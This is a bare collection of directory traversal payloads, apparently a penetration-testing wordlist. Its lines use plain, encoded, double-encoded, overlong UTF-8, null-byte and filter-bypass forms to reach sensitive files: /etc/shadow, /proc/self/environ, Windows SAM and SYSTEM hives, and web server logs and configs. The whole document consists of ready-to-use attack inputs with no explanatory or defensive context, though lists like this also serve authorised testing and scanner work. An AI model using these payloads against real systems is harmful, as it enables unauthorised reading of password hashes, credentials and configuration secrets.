# Directory traversal payload collection
# Basic traversal
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd

# Encoded traversal
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e/%2e%2e/%2e%2e/etc/passwd
..%2f..%2f..%2fetc%2fpasswd

# Double encoding
%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd

# Unicode encoding
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afpasswd

# Null byte injection
../../../etc/passwd%00
../../../etc/passwd%00.jpg

# Other Linux files
../../../etc/shadow
../../../etc/hosts
../../../etc/group
../../../proc/version
../../../proc/cmdline
../../../proc/self/environ

# Log files
../../../var/log/apache2/access.log
../../../var/log/apache2/error.log
../../../var/log/nginx/access.log
../../../var/log/nginx/error.log

# Configuration files
../../../etc/apache2/apache2.conf
../../../etc/nginx/nginx.conf
../../../etc/mysql/my.cnf
../../../etc/ssh/sshd_config

# Windows basic traversal
..\\..\\..\\windows\\system32\\drivers\\etc\\hosts
..\\..\\..\\windows\\win.ini
..\\..\\..\\windows\\system.ini
..\\..\\..\\boot.ini

# Mixed slashes
../../../windows/system32/drivers/etc/hosts
../../../windows/win.ini
../../../windows/system.ini
../../../boot.ini

# Encoded traversal
%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini
%2e%2e/%2e%2e/%2e%2e/windows/win.ini

# Other Windows files
..\\..\\..\\windows\\system32\\config\\sam
..\\..\\..\\windows\\system32\\config\\system
..\\..\\..\\windows\\system32\\config\\software
..\\..\\..\\windows\\repair\\sam
..\\..\\..\\windows\\repair\\system

# IIS logs
..\\..\\..\\inetpub\\logs\\logfiles\\w3svc1\\ex*.log
..\\..\\..\\windows\\system32\\logfiles\\w3svc1\\ex*.log

# Application files
..\\..\\..\\program files\\apache group\\apache\\conf\\httpd.conf
..\\..\\..\\program files\\apache group\\apache\\logs\\access.log
..\\..\\..\\program files\\apache group\\apache\\logs\\error.log

# Absolute paths
/etc/passwd
/etc/shadow
/etc/hosts
C:\\windows\\win.ini
C:\\windows\\system.ini

# Current directory
./../../etc/passwd
.\\..\\..\\windows\\win.ini

# Filter bypass
....//....//....//etc/passwd
....\\\\....\\\\....\\\\windows\\\\win.ini

# Overlong UTF-8
%c0%ae%c0%ae%c0%af
%e0%80%ae%e0%80%ae%e0%80%af

# 16-bit Unicode
%u002e%u002e%u002f
%u002e%u002e%u005c
